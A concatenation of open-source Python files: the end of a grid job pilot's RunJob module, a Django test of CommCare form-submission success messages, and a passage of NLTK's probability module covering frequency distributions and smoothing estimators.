%s" % (pilotErrorDiag)) # # restore the proxy if necessary # if hP_ret: # rP_ret = proxyguard.restoreProxy() # if not rP_ret: # tolog("Warning: Problems with storage can occur since proxy could not be restored") # else: # hP_ret = False # tolog("ProxyGuard has finished successfully") tolog("sys.path=%s" % str(sys.path)) cmd = "pwd;ls -lF %s;ls -lF;ls -lF .." % (runJob.getPilotInitDir()) tolog("Executing command: %s" % (cmd)) out = commands.getoutput(cmd) tolog("%s" % (out)) job = Job.Job() job.setJobDef(newJobDef.job) job.pilotErrorDiag = pilotErrorDiag job.result[0] = "failed" if runJob.getGlobalErrorCode() != 0: job.result[2] = runJob.getGlobalErrorCode() else: job.result[2] = error.ERR_RUNJOBEXC tolog("Failing job with error code: %d" % (job.result[2])) # fail the job without calling sysExit/cleanup (will be called anyway) runJob.failJob(0, job.result[2], job, pilotErrorDiag=pilotErrorDiag, docleanup=False) # end of runJob
RRCKI/pilot
RunJob.py
Python
apache-2.0
69,493
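One of the more subtle pieces of the RunJob module above is getTrfExitInfo(), which lets the payload's own job report (jobReport.json, or a pickle extract on older releases) override the raw process exit code, except when the report claims success while the process itself returned non-zero. A stripped-down sketch of that precedence rule is below; it keeps the file name and dictionary keys used in the code above but drops the backup, retry and logging details, so it is an illustration rather than the pilot's implementation.

import json
import os


def trf_exit_info(raw_exit_code, workdir, report_name="jobReport.json"):
    """Return (exit_code, acronym, msg), preferring the job report when it is trustworthy."""
    path = os.path.join(workdir, report_name)
    if not os.path.exists(path):
        return raw_exit_code, "", ""

    with open(path) as f:
        report = json.load(f)

    reported = report.get("exitCode")
    if reported is not None:
        if reported == 0 and raw_exit_code != 0:
            # Inconsistent report: keep the original, non-zero exit code.
            pass
        else:
            raw_exit_code = reported
    return raw_exit_code, report.get("exitAcronym", ""), report.get("exitMsg", "")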
from StringIO import StringIO
from django.test import TestCase
from django.test.client import Client
from corehq.apps.app_manager.models import Application, APP_V1, Module
from corehq.apps.app_manager.success_message import SuccessMessage
from corehq.apps.domain.shortcuts import create_domain
from corehq.apps.users.models import CommCareUser
from datetime import datetime, timedelta
from dimagi.utils.parsing import json_format_datetime
from receiver.xml import get_simple_response_xml, ResponseNature

submission_template = """<?xml version='1.0' ?>
<data xmlns="%(xmlns)s">
    <meta>
        <username>%(username)s</username>
        <userID>%(userID)s</userID>
    </meta>
</data>
"""


class SuccessMessageTest(TestCase):
    message = "Thanks $first_name ($name)! You have submitted $today forms today and $week forms since Monday."
    domain = "test"
    username = "danny"
    first_name = "Danny"
    last_name = "Roberts"
    password = "123"
    xmlns = "http://dimagi.com/does_not_matter"
    tz = timedelta(hours=0)

    def setUp(self):
        create_domain(self.domain)
        couch_user = CommCareUser.create(self.domain, self.username, self.password)
        userID = couch_user.user_id
        couch_user.first_name = self.first_name
        couch_user.last_name = self.last_name
        couch_user.save()
        self.sm = SuccessMessage(self.message, userID, tz=self.tz)

        c = Client()
        app = Application.new_app(self.domain, "Test App", application_version=APP_V1)
        app.add_module(Module.new_module("Test Module", "en"))
        form = app.new_form(0, "Test Form", "en")
        form.xmlns = self.xmlns
        app.success_message = {"en": self.message}
        app.save()

        def fake_form_submission(userID=userID, username=self.username, xmlns=self.xmlns, time=None):
            submission = submission_template % {
                "userID": userID,
                "username": username,
                "xmlns": xmlns
            }
            f = StringIO(submission.encode('utf-8'))
            f.name = "tempfile.xml"
            kwargs = dict(HTTP_X_SUBMIT_TIME=json_format_datetime(time)) if time else {}
            response = c.post("/a/{self.domain}/receiver/".format(self=self), {
                'xml_submission_file': f,
            }, **kwargs)
            return response

        self.num_forms_today = 0
        self.num_forms_this_week = 0
        now = datetime.utcnow()
        tznow = now + self.tz
        week_start = tznow - timedelta(days=tznow.weekday())
        week_start = datetime(week_start.year, week_start.month, week_start.day) - self.tz
        day_start = datetime(tznow.year, tznow.month, tznow.day) - self.tz
        spacing = 6
        for h in xrange((24/spacing)*8):
            time = now-timedelta(hours=spacing*h)
            response = fake_form_submission(time=time)
            if time > week_start:
                self.num_forms_this_week += 1
            if time > day_start:
                self.num_forms_today += 1
            self.assertEqual(
                response.content,
                get_simple_response_xml(("Thanks {self.first_name} ({self.first_name} {self.last_name})! "
                                         "You have submitted {self.num_forms_today} forms today "
                                         "and {self.num_forms_this_week} forms since Monday.").format(self=self),
                                        nature=ResponseNature.SUBMIT_SUCCESS)
            )

    def testRender(self):
        self.assertEqual(
            self.sm.render(),
            ("Thanks {self.first_name} ({self.first_name} {self.last_name})! "
             "You have submitted {self.num_forms_today} forms today "
             "and {self.num_forms_this_week} forms since Monday.").format(self=self)
        )
gmimano/commcaretest
corehq/apps/app_manager/tests/test_success_message.py
Python
bsd-3-clause
3,754
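The test above drives SuccessMessage.render(), which fills the $first_name, $name, $today and $week placeholders from the submitting user and their recent form counts. The real corehq class pulls those values from the user document and form submissions; the sketch below only illustrates the $-placeholder substitution itself with string.Template and hard-coded counts, so the function name and arguments are hypothetical.

from string import Template


def render_success_message(message, first_name, last_name, forms_today, forms_this_week):
    """Fill the $-style placeholders used by an app's success_message setting."""
    return Template(message).substitute(
        first_name=first_name,
        name="%s %s" % (first_name, last_name),
        today=forms_today,
        week=forms_this_week,
    )


print(render_success_message(
    "Thanks $first_name ($name)! You have submitted $today forms today and $week forms since Monday.",
    "Danny", "Roberts", 3, 12,
))
# -> Thanks Danny (Danny Roberts)! You have submitted 3 forms today and 12 forms since Monday.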
# -*- coding: utf-8 -*- # Natural Language Toolkit: Probability and Statistics # # Copyright (C) 2001-2015 NLTK Project # Author: Edward Loper <[email protected]> # Steven Bird <[email protected]> (additions) # Trevor Cohn <[email protected]> (additions) # Peter Ljunglöf <[email protected]> (additions) # Liang Dong <[email protected]> (additions) # Geoffrey Sampson <[email protected]> (additions) # Ilia Kurenkov <[email protected]> (additions) # # URL: <http://nltk.org/> # For license information, see LICENSE.TXT """ Classes for representing and processing probabilistic information. The ``FreqDist`` class is used to encode "frequency distributions", which count the number of times that each outcome of an experiment occurs. The ``ProbDistI`` class defines a standard interface for "probability distributions", which encode the probability of each outcome for an experiment. There are two types of probability distribution: - "derived probability distributions" are created from frequency distributions. They attempt to model the probability distribution that generated the frequency distribution. - "analytic probability distributions" are created directly from parameters (such as variance). The ``ConditionalFreqDist`` class and ``ConditionalProbDistI`` interface are used to encode conditional distributions. Conditional probability distributions can be derived or analytic; but currently the only implementation of the ``ConditionalProbDistI`` interface is ``ConditionalProbDist``, a derived distribution. """ from __future__ import print_function, unicode_literals import math import random import warnings import array from operator import itemgetter from collections import defaultdict from functools import reduce from nltk import compat from nltk.compat import Counter from nltk.internals import raise_unorderable_types _NINF = float('-1e300') ##////////////////////////////////////////////////////// ## Frequency Distributions ##////////////////////////////////////////////////////// @compat.python_2_unicode_compatible class FreqDist(Counter): """ A frequency distribution for the outcomes of an experiment. A frequency distribution records the number of times each outcome of an experiment has occurred. For example, a frequency distribution could be used to record the frequency of each word type in a document. Formally, a frequency distribution can be defined as a function mapping from each sample to the number of times that sample occurred as an outcome. Frequency distributions are generally constructed by running a number of experiments, and incrementing the count for a sample every time it is an outcome of an experiment. For example, the following code will produce a frequency distribution that encodes how often each word occurs in a text: >>> from nltk.tokenize import word_tokenize >>> from nltk.probability import FreqDist >>> sent = 'This is an example sentence' >>> fdist = FreqDist() >>> for word in word_tokenize(sent): ... fdist[word.lower()] += 1 An equivalent way to do this is with the initializer: >>> fdist = FreqDist(word.lower() for word in word_tokenize(sent)) """ def __init__(self, samples=None): """ Construct a new frequency distribution. If ``samples`` is given, then the frequency distribution will be initialized with the count of each object in ``samples``; otherwise, it will be initialized to be empty. 
In particular, ``FreqDist()`` returns an empty frequency distribution; and ``FreqDist(samples)`` first creates an empty frequency distribution, and then calls ``update`` with the list ``samples``. :param samples: The samples to initialize the frequency distribution with. :type samples: Sequence """ Counter.__init__(self, samples) def N(self): """ Return the total number of sample outcomes that have been recorded by this FreqDist. For the number of unique sample values (or bins) with counts greater than zero, use ``FreqDist.B()``. :rtype: int """ return sum(self.values()) def B(self): """ Return the total number of sample values (or "bins") that have counts greater than zero. For the total number of sample outcomes recorded, use ``FreqDist.N()``. (FreqDist.B() is the same as len(FreqDist).) :rtype: int """ return len(self) def hapaxes(self): """ Return a list of all samples that occur once (hapax legomena) :rtype: list """ return [item for item in self if self[item] == 1] def Nr(self, r, bins=None): return self.r_Nr(bins)[r] def r_Nr(self, bins=None): """ Return the dictionary mapping r to Nr, the number of samples with frequency r, where Nr > 0. :type bins: int :param bins: The number of possible sample outcomes. ``bins`` is used to calculate Nr(0). In particular, Nr(0) is ``bins-self.B()``. If ``bins`` is not specified, it defaults to ``self.B()`` (so Nr(0) will be 0). :rtype: int """ _r_Nr = defaultdict(int) for count in self.values(): _r_Nr[count] += 1 # Special case for Nr[0]: _r_Nr[0] = bins - self.B() if bins is not None else 0 return _r_Nr def _cumulative_frequencies(self, samples): """ Return the cumulative frequencies of the specified samples. If no samples are specified, all counts are returned, starting with the largest. :param samples: the samples whose frequencies should be returned. :type samples: any :rtype: list(float) """ cf = 0.0 for sample in samples: cf += self[sample] yield cf # slightly odd nomenclature freq() if FreqDist does counts and ProbDist does probs, # here, freq() does probs def freq(self, sample): """ Return the frequency of a given sample. The frequency of a sample is defined as the count of that sample divided by the total number of sample outcomes that have been recorded by this FreqDist. The count of a sample is defined as the number of times that sample outcome was recorded by this FreqDist. Frequencies are always real numbers in the range [0, 1]. :param sample: the sample whose frequency should be returned. :type sample: any :rtype: float """ if self.N() == 0: return 0 return float(self[sample]) / self.N() def max(self): """ Return the sample with the greatest number of outcomes in this frequency distribution. If two or more samples have the same number of outcomes, return one of them; which sample is returned is undefined. If no outcomes have occurred in this frequency distribution, return None. :return: The sample with the maximum number of outcomes in this frequency distribution. :rtype: any or None """ if len(self) == 0: raise ValueError('A FreqDist must have at least one sample before max is defined.') return self.most_common(1)[0][0] def plot(self, *args, **kwargs): """ Plot samples from the frequency distribution displaying the most frequent sample first. If an integer parameter is supplied, stop after this many samples have been plotted. For a cumulative plot, specify cumulative=True. (Requires Matplotlib to be installed.) 
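        A hedged usage sketch (illustrative only; assumes matplotlib is
        installed and a display is available, so the example is marked to be
        skipped by doctest):

        >>> FreqDist('abracadabra').plot(5, cumulative=True)  # doctest: +SKIP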
:param title: The title for the graph :type title: str :param cumulative: A flag to specify whether the plot is cumulative (default = False) :type title: bool """ try: from matplotlib import pylab except ImportError: raise ValueError('The plot function requires matplotlib to be installed.' 'See http://matplotlib.org/') if len(args) == 0: args = [len(self)] samples = [item for item, _ in self.most_common(*args)] cumulative = _get_kwarg(kwargs, 'cumulative', False) if cumulative: freqs = list(self._cumulative_frequencies(samples)) ylabel = "Cumulative Counts" else: freqs = [self[sample] for sample in samples] ylabel = "Counts" # percents = [f * 100 for f in freqs] only in ProbDist? pylab.grid(True, color="silver") if not "linewidth" in kwargs: kwargs["linewidth"] = 2 if "title" in kwargs: pylab.title(kwargs["title"]) del kwargs["title"] pylab.plot(freqs, **kwargs) pylab.xticks(range(len(samples)), [compat.text_type(s) for s in samples], rotation=90) pylab.xlabel("Samples") pylab.ylabel(ylabel) pylab.show() def tabulate(self, *args, **kwargs): """ Tabulate the given samples from the frequency distribution (cumulative), displaying the most frequent sample first. If an integer parameter is supplied, stop after this many samples have been plotted. :param samples: The samples to plot (default is all samples) :type samples: list """ if len(args) == 0: args = [len(self)] samples = [item for item, _ in self.most_common(*args)] cumulative = _get_kwarg(kwargs, 'cumulative', False) if cumulative: freqs = list(self._cumulative_frequencies(samples)) else: freqs = [self[sample] for sample in samples] # percents = [f * 100 for f in freqs] only in ProbDist? for i in range(len(samples)): print("%4s" % samples[i], end=' ') print() for i in range(len(samples)): print("%4d" % freqs[i], end=' ') print() def copy(self): """ Create a copy of this frequency distribution. :rtype: FreqDist """ return self.__class__(self) def __le__(self, other): if not isinstance(other, FreqDist): raise_unorderable_types("<=", self, other) return set(self).issubset(other) and all(self[key] <= other[key] for key in self) # @total_ordering doesn't work here, since the class inherits from a builtin class __ge__ = lambda self, other: not self <= other or self == other __lt__ = lambda self, other: self <= other and not self == other __gt__ = lambda self, other: not self <= other def __repr__(self): """ Return a string representation of this FreqDist. :rtype: string """ return self.pformat() def pprint(self, maxlen=10, stream=None): """ Print a string representation of this FreqDist to 'stream' :param maxlen: The maximum number of items to print :type maxlen: int :param stream: The stream to print to. stdout by default """ print(self.pformat(maxlen=maxlen), file=stream) def pformat(self, maxlen=10): """ Return a string representation of this FreqDist. :param maxlen: The maximum number of items to display :type maxlen: int :rtype: string """ items = ['{0!r}: {1!r}'.format(*item) for item in self.most_common(maxlen)] if len(self) > maxlen: items.append('...') return 'FreqDist({{{0}}})'.format(', '.join(items)) def __str__(self): """ Return a string representation of this FreqDist. :rtype: string """ return '<FreqDist with %d samples and %d outcomes>' % (len(self), self.N()) ##////////////////////////////////////////////////////// ## Probability Distributions ##////////////////////////////////////////////////////// class ProbDistI(object): """ A probability distribution for the outcomes of an experiment. 
A probability distribution specifies how likely it is that an experiment will have any given outcome. For example, a probability distribution could be used to predict the probability that a token in a document will have a given type. Formally, a probability distribution can be defined as a function mapping from samples to nonnegative real numbers, such that the sum of every number in the function's range is 1.0. A ``ProbDist`` is often used to model the probability distribution of the experiment used to generate a frequency distribution. """ SUM_TO_ONE = True """True if the probabilities of the samples in this probability distribution will always sum to one.""" def __init__(self): if self.__class__ == ProbDistI: raise NotImplementedError("Interfaces can't be instantiated") def prob(self, sample): """ Return the probability for a given sample. Probabilities are always real numbers in the range [0, 1]. :param sample: The sample whose probability should be returned. :type sample: any :rtype: float """ raise NotImplementedError() def logprob(self, sample): """ Return the base 2 logarithm of the probability for a given sample. :param sample: The sample whose probability should be returned. :type sample: any :rtype: float """ # Default definition, in terms of prob() p = self.prob(sample) return (math.log(p, 2) if p != 0 else _NINF) def max(self): """ Return the sample with the greatest probability. If two or more samples have the same probability, return one of them; which sample is returned is undefined. :rtype: any """ raise NotImplementedError() def samples(self): """ Return a list of all samples that have nonzero probabilities. Use ``prob`` to find the probability of each sample. :rtype: list """ raise NotImplementedError() # cf self.SUM_TO_ONE def discount(self): """ Return the ratio by which counts are discounted on average: c*/c :rtype: float """ return 0.0 # Subclasses should define more efficient implementations of this, # where possible. def generate(self): """ Return a randomly selected sample from this probability distribution. The probability of returning each sample ``samp`` is equal to ``self.prob(samp)``. """ p = random.random() p_init = p for sample in self.samples(): p -= self.prob(sample) if p <= 0: return sample # allow for some rounding error: if p < .0001: return sample # we *should* never get here if self.SUM_TO_ONE: warnings.warn("Probability distribution %r sums to %r; generate()" " is returning an arbitrary sample." % (self, p_init-p)) return random.choice(list(self.samples())) @compat.python_2_unicode_compatible class UniformProbDist(ProbDistI): """ A probability distribution that assigns equal probability to each sample in a given set; and a zero probability to all other samples. """ def __init__(self, samples): """ Construct a new uniform probability distribution, that assigns equal probability to each sample in ``samples``. :param samples: The samples that should be given uniform probability. :type samples: list :raise ValueError: If ``samples`` is empty. 
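        A small doctest-style illustration (added for clarity; not part of
        the original documentation):

        >>> pd = UniformProbDist(['a', 'b', 'c', 'd'])
        >>> pd.prob('a')
        0.25
        >>> pd.prob('z')
        0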
""" if len(samples) == 0: raise ValueError('A Uniform probability distribution must '+ 'have at least one sample.') self._sampleset = set(samples) self._prob = 1.0/len(self._sampleset) self._samples = list(self._sampleset) def prob(self, sample): return (self._prob if sample in self._sampleset else 0) def max(self): return self._samples[0] def samples(self): return self._samples def __repr__(self): return '<UniformProbDist with %d samples>' % len(self._sampleset) @compat.python_2_unicode_compatible class RandomProbDist(ProbDistI): """ Generates a random probability distribution whereby each sample will be between 0 and 1 with equal probability (uniform random distribution. Also called a continuous uniform distribution). """ def __init__(self, samples): if len(samples) == 0: raise ValueError('A probability distribution must '+ 'have at least one sample.') self._probs = self.unirand(samples) self._samples = list(self._probs.keys()) @classmethod def unirand(cls, samples): """ The key function that creates a randomized initial distribution that still sums to 1. Set as a dictionary of prob values so that it can still be passed to MutableProbDist and called with identical syntax to UniformProbDist """ randrow = [random.random() for i in range(len(samples))] total = sum(randrow) for i, x in enumerate(randrow): randrow[i] = x/total total = sum(randrow) if total != 1: #this difference, if present, is so small (near NINF) that it #can be subtracted from any element without risking probs not (0 1) randrow[-1] -= total - 1 return dict((s, randrow[i]) for i, s in enumerate(samples)) def prob(self, sample): return self._probs.get(sample, 0) def samples(self): return self._samples def __repr__(self): return '<RandomUniformProbDist with %d samples>' %len(self._probs) @compat.python_2_unicode_compatible class DictionaryProbDist(ProbDistI): """ A probability distribution whose probabilities are directly specified by a given dictionary. The given dictionary maps samples to probabilities. """ def __init__(self, prob_dict=None, log=False, normalize=False): """ Construct a new probability distribution from the given dictionary, which maps values to probabilities (or to log probabilities, if ``log`` is true). If ``normalize`` is true, then the probability values are scaled by a constant factor such that they sum to 1. If called without arguments, the resulting probability distribution assigns zero probability to all values. """ self._prob_dict = (prob_dict.copy() if prob_dict is not None else {}) self._log = log # Normalize the distribution, if requested. 
if normalize: if len(prob_dict) == 0: raise ValueError('A DictionaryProbDist must have at least one sample ' + 'before it can be normalized.') if log: value_sum = sum_logs(list(self._prob_dict.values())) if value_sum <= _NINF: logp = math.log(1.0/len(prob_dict), 2) for x in prob_dict: self._prob_dict[x] = logp else: for (x, p) in self._prob_dict.items(): self._prob_dict[x] -= value_sum else: value_sum = sum(self._prob_dict.values()) if value_sum == 0: p = 1.0/len(prob_dict) for x in prob_dict: self._prob_dict[x] = p else: norm_factor = 1.0/value_sum for (x, p) in self._prob_dict.items(): self._prob_dict[x] *= norm_factor def prob(self, sample): if self._log: return (2**(self._prob_dict[sample]) if sample in self._prob_dict else 0) else: return self._prob_dict.get(sample, 0) def logprob(self, sample): if self._log: return self._prob_dict.get(sample, _NINF) else: if sample not in self._prob_dict: return _NINF elif self._prob_dict[sample] == 0: return _NINF else: return math.log(self._prob_dict[sample], 2) def max(self): if not hasattr(self, '_max'): self._max = max((p,v) for (v,p) in self._prob_dict.items())[1] return self._max def samples(self): return self._prob_dict.keys() def __repr__(self): return '<ProbDist with %d samples>' % len(self._prob_dict) @compat.python_2_unicode_compatible class MLEProbDist(ProbDistI): """ The maximum likelihood estimate for the probability distribution of the experiment used to generate a frequency distribution. The "maximum likelihood estimate" approximates the probability of each sample as the frequency of that sample in the frequency distribution. """ def __init__(self, freqdist, bins=None): """ Use the maximum likelihood estimate to create a probability distribution for the experiment used to generate ``freqdist``. :type freqdist: FreqDist :param freqdist: The frequency distribution that the probability estimates should be based on. """ self._freqdist = freqdist def freqdist(self): """ Return the frequency distribution that this probability distribution is based on. :rtype: FreqDist """ return self._freqdist def prob(self, sample): return self._freqdist.freq(sample) def max(self): return self._freqdist.max() def samples(self): return self._freqdist.keys() def __repr__(self): """ :rtype: str :return: A string representation of this ``ProbDist``. """ return '<MLEProbDist based on %d samples>' % self._freqdist.N() @compat.python_2_unicode_compatible class LidstoneProbDist(ProbDistI): """ The Lidstone estimate for the probability distribution of the experiment used to generate a frequency distribution. The "Lidstone estimate" is parameterized by a real number *gamma*, which typically ranges from 0 to 1. The Lidstone estimate approximates the probability of a sample with count *c* from an experiment with *N* outcomes and *B* bins as ``c+gamma)/(N+B*gamma)``. This is equivalent to adding *gamma* to the count for each bin, and taking the maximum likelihood estimate of the resulting frequency distribution. """ SUM_TO_ONE = False def __init__(self, freqdist, gamma, bins=None): """ Use the Lidstone estimate to create a probability distribution for the experiment used to generate ``freqdist``. :type freqdist: FreqDist :param freqdist: The frequency distribution that the probability estimates should be based on. :type gamma: float :param gamma: A real number used to parameterize the estimate. The Lidstone estimate is equivalent to adding *gamma* to the count for each bin, and taking the maximum likelihood estimate of the resulting frequency distribution. 
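        A worked doctest-style example (added for illustration; not part of
        the original documentation):

        >>> fd = FreqDist('aab')           # counts: a=2, b=1; N=3, B=2
        >>> lid = LidstoneProbDist(fd, 0.5)
        >>> lid.prob('a')                  # (2 + 0.5) / (3 + 2*0.5)
        0.625
        >>> lid.prob('c')                  # unseen: (0 + 0.5) / 4
        0.125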
:type bins: int :param bins: The number of sample values that can be generated by the experiment that is described by the probability distribution. This value must be correctly set for the probabilities of the sample values to sum to one. If ``bins`` is not specified, it defaults to ``freqdist.B()``. """ if (bins == 0) or (bins is None and freqdist.N() == 0): name = self.__class__.__name__[:-8] raise ValueError('A %s probability distribution ' % name + 'must have at least one bin.') if (bins is not None) and (bins < freqdist.B()): name = self.__class__.__name__[:-8] raise ValueError('\nThe number of bins in a %s distribution ' % name + '(%d) must be greater than or equal to\n' % bins + 'the number of bins in the FreqDist used ' + 'to create it (%d).' % freqdist.B()) self._freqdist = freqdist self._gamma = float(gamma) self._N = self._freqdist.N() if bins is None: bins = freqdist.B() self._bins = bins self._divisor = self._N + bins * gamma if self._divisor == 0.0: # In extreme cases we force the probability to be 0, # which it will be, since the count will be 0: self._gamma = 0 self._divisor = 1 def freqdist(self): """ Return the frequency distribution that this probability distribution is based on. :rtype: FreqDist """ return self._freqdist def prob(self, sample): c = self._freqdist[sample] return (c + self._gamma) / self._divisor def max(self): # For Lidstone distributions, probability is monotonic with # frequency, so the most probable sample is the one that # occurs most frequently. return self._freqdist.max() def samples(self): return self._freqdist.keys() def discount(self): gb = self._gamma * self._bins return gb / (self._N + gb) def __repr__(self): """ Return a string representation of this ``ProbDist``. :rtype: str """ return '<LidstoneProbDist based on %d samples>' % self._freqdist.N() @compat.python_2_unicode_compatible class LaplaceProbDist(LidstoneProbDist): """ The Laplace estimate for the probability distribution of the experiment used to generate a frequency distribution. The "Laplace estimate" approximates the probability of a sample with count *c* from an experiment with *N* outcomes and *B* bins as *(c+1)/(N+B)*. This is equivalent to adding one to the count for each bin, and taking the maximum likelihood estimate of the resulting frequency distribution. """ def __init__(self, freqdist, bins=None): """ Use the Laplace estimate to create a probability distribution for the experiment used to generate ``freqdist``. :type freqdist: FreqDist :param freqdist: The frequency distribution that the probability estimates should be based on. :type bins: int :param bins: The number of sample values that can be generated by the experiment that is described by the probability distribution. This value must be correctly set for the probabilities of the sample values to sum to one. If ``bins`` is not specified, it defaults to ``freqdist.B()``. """ LidstoneProbDist.__init__(self, freqdist, 1, bins) def __repr__(self): """ :rtype: str :return: A string representation of this ``ProbDist``. """ return '<LaplaceProbDist based on %d samples>' % self._freqdist.N() @compat.python_2_unicode_compatible class ELEProbDist(LidstoneProbDist): """ The expected likelihood estimate for the probability distribution of the experiment used to generate a frequency distribution. The "expected likelihood estimate" approximates the probability of a sample with count *c* from an experiment with *N* outcomes and *B* bins as *(c+0.5)/(N+B/2)*. 
This is equivalent to adding 0.5 to the count for each bin, and taking the maximum likelihood estimate of the resulting frequency distribution. """ def __init__(self, freqdist, bins=None): """ Use the expected likelihood estimate to create a probability distribution for the experiment used to generate ``freqdist``. :type freqdist: FreqDist :param freqdist: The frequency distribution that the probability estimates should be based on. :type bins: int :param bins: The number of sample values that can be generated by the experiment that is described by the probability distribution. This value must be correctly set for the probabilities of the sample values to sum to one. If ``bins`` is not specified, it defaults to ``freqdist.B()``. """ LidstoneProbDist.__init__(self, freqdist, 0.5, bins) def __repr__(self): """ Return a string representation of this ``ProbDist``. :rtype: str """ return '<ELEProbDist based on %d samples>' % self._freqdist.N() @compat.python_2_unicode_compatible class HeldoutProbDist(ProbDistI): """ The heldout estimate for the probability distribution of the experiment used to generate two frequency distributions. These two frequency distributions are called the "heldout frequency distribution" and the "base frequency distribution." The "heldout estimate" uses uses the "heldout frequency distribution" to predict the probability of each sample, given its frequency in the "base frequency distribution". In particular, the heldout estimate approximates the probability for a sample that occurs *r* times in the base distribution as the average frequency in the heldout distribution of all samples that occur *r* times in the base distribution. This average frequency is *Tr[r]/(Nr[r].N)*, where: - *Tr[r]* is the total count in the heldout distribution for all samples that occur *r* times in the base distribution. - *Nr[r]* is the number of samples that occur *r* times in the base distribution. - *N* is the number of outcomes recorded by the heldout frequency distribution. In order to increase the efficiency of the ``prob`` member function, *Tr[r]/(Nr[r].N)* is precomputed for each value of *r* when the ``HeldoutProbDist`` is created. :type _estimate: list(float) :ivar _estimate: A list mapping from *r*, the number of times that a sample occurs in the base distribution, to the probability estimate for that sample. ``_estimate[r]`` is calculated by finding the average frequency in the heldout distribution of all samples that occur *r* times in the base distribution. In particular, ``_estimate[r]`` = *Tr[r]/(Nr[r].N)*. :type _max_r: int :ivar _max_r: The maximum number of times that any sample occurs in the base distribution. ``_max_r`` is used to decide how large ``_estimate`` must be. """ SUM_TO_ONE = False def __init__(self, base_fdist, heldout_fdist, bins=None): """ Use the heldout estimate to create a probability distribution for the experiment used to generate ``base_fdist`` and ``heldout_fdist``. :type base_fdist: FreqDist :param base_fdist: The base frequency distribution. :type heldout_fdist: FreqDist :param heldout_fdist: The heldout frequency distribution. :type bins: int :param bins: The number of sample values that can be generated by the experiment that is described by the probability distribution. This value must be correctly set for the probabilities of the sample values to sum to one. If ``bins`` is not specified, it defaults to ``freqdist.B()``. 
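        A worked doctest-style example (added for illustration; not part of
        the original documentation):

        >>> base = FreqDist('aaab')        # 'a' occurs 3 times, 'b' once
        >>> heldout = FreqDist('aabb')     # 'a' twice, 'b' twice; N = 4
        >>> hpd = HeldoutProbDist(base, heldout)
        >>> hpd.prob('a')                  # Tr[3]/(Nr[3]*N) = 2.0/(1*4)
        0.5
        >>> hpd.prob('b')                  # Tr[1]/(Nr[1]*N) = 2.0/(1*4)
        0.5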
""" self._base_fdist = base_fdist self._heldout_fdist = heldout_fdist # The max number of times any sample occurs in base_fdist. self._max_r = base_fdist[base_fdist.max()] # Calculate Tr, Nr, and N. Tr = self._calculate_Tr() r_Nr = base_fdist.r_Nr(bins) Nr = [r_Nr[r] for r in range(self._max_r+1)] N = heldout_fdist.N() # Use Tr, Nr, and N to compute the probability estimate for # each value of r. self._estimate = self._calculate_estimate(Tr, Nr, N) def _calculate_Tr(self): """ Return the list *Tr*, where *Tr[r]* is the total count in ``heldout_fdist`` for all samples that occur *r* times in ``base_fdist``. :rtype: list(float) """ Tr = [0.0] * (self._max_r+1) for sample in self._heldout_fdist: r = self._base_fdist[sample] Tr[r] += self._heldout_fdist[sample] return Tr def _calculate_estimate(self, Tr, Nr, N): """ Return the list *estimate*, where *estimate[r]* is the probability estimate for any sample that occurs *r* times in the base frequency distribution. In particular, *estimate[r]* is *Tr[r]/(N[r].N)*. In the special case that *N[r]=0*, *estimate[r]* will never be used; so we define *estimate[r]=None* for those cases. :rtype: list(float) :type Tr: list(float) :param Tr: the list *Tr*, where *Tr[r]* is the total count in the heldout distribution for all samples that occur *r* times in base distribution. :type Nr: list(float) :param Nr: The list *Nr*, where *Nr[r]* is the number of samples that occur *r* times in the base distribution. :type N: int :param N: The total number of outcomes recorded by the heldout frequency distribution. """ estimate = [] for r in range(self._max_r+1): if Nr[r] == 0: estimate.append(None) else: estimate.append(Tr[r]/(Nr[r]*N)) return estimate def base_fdist(self): """ Return the base frequency distribution that this probability distribution is based on. :rtype: FreqDist """ return self._base_fdist def heldout_fdist(self): """ Return the heldout frequency distribution that this probability distribution is based on. :rtype: FreqDist """ return self._heldout_fdist def samples(self): return self._base_fdist.keys() def prob(self, sample): # Use our precomputed probability estimate. r = self._base_fdist[sample] return self._estimate[r] def max(self): # Note: the Heldout estimation is *not* necessarily monotonic; # so this implementation is currently broken. However, it # should give the right answer *most* of the time. :) return self._base_fdist.max() def discount(self): raise NotImplementedError() def __repr__(self): """ :rtype: str :return: A string representation of this ``ProbDist``. """ s = '<HeldoutProbDist: %d base samples; %d heldout samples>' return s % (self._base_fdist.N(), self._heldout_fdist.N()) @compat.python_2_unicode_compatible class CrossValidationProbDist(ProbDistI): """ The cross-validation estimate for the probability distribution of the experiment used to generate a set of frequency distribution. The "cross-validation estimate" for the probability of a sample is found by averaging the held-out estimates for the sample in each pair of frequency distributions. """ SUM_TO_ONE = False def __init__(self, freqdists, bins): """ Use the cross-validation estimate to create a probability distribution for the experiment used to generate ``freqdists``. :type freqdists: list(FreqDist) :param freqdists: A list of the frequency distributions generated by the experiment. :type bins: int :param bins: The number of sample values that can be generated by the experiment that is described by the probability distribution. 
This value must be correctly set for the probabilities of the sample values to sum to one. If ``bins`` is not specified, it defaults to ``freqdist.B()``. """ self._freqdists = freqdists # Create a heldout probability distribution for each pair of # frequency distributions in freqdists. self._heldout_probdists = [] for fdist1 in freqdists: for fdist2 in freqdists: if fdist1 is not fdist2: probdist = HeldoutProbDist(fdist1, fdist2, bins) self._heldout_probdists.append(probdist) def freqdists(self): """ Return the list of frequency distributions that this ``ProbDist`` is based on. :rtype: list(FreqDist) """ return self._freqdists def samples(self): # [xx] nb: this is not too efficient return set(sum([list(fd) for fd in self._freqdists], [])) def prob(self, sample): # Find the average probability estimate returned by each # heldout distribution. prob = 0.0 for heldout_probdist in self._heldout_probdists: prob += heldout_probdist.prob(sample) return prob/len(self._heldout_probdists) def discount(self): raise NotImplementedError() def __repr__(self): """ Return a string representation of this ``ProbDist``. :rtype: str """ return '<CrossValidationProbDist: %d-way>' % len(self._freqdists) @compat.python_2_unicode_compatible class WittenBellProbDist(ProbDistI): """ The Witten-Bell estimate of a probability distribution. This distribution allocates uniform probability mass to as yet unseen events by using the number of events that have only been seen once. The probability mass reserved for unseen events is equal to *T / (N + T)* where *T* is the number of observed event types and *N* is the total number of observed events. This equates to the maximum likelihood estimate of a new type event occurring. The remaining probability mass is discounted such that all probability estimates sum to one, yielding: - *p = T / Z (N + T)*, if count = 0 - *p = c / (N + T)*, otherwise """ def __init__(self, freqdist, bins=None): """ Creates a distribution of Witten-Bell probability estimates. This distribution allocates uniform probability mass to as yet unseen events by using the number of events that have only been seen once. The probability mass reserved for unseen events is equal to *T / (N + T)* where *T* is the number of observed event types and *N* is the total number of observed events. This equates to the maximum likelihood estimate of a new type event occurring. The remaining probability mass is discounted such that all probability 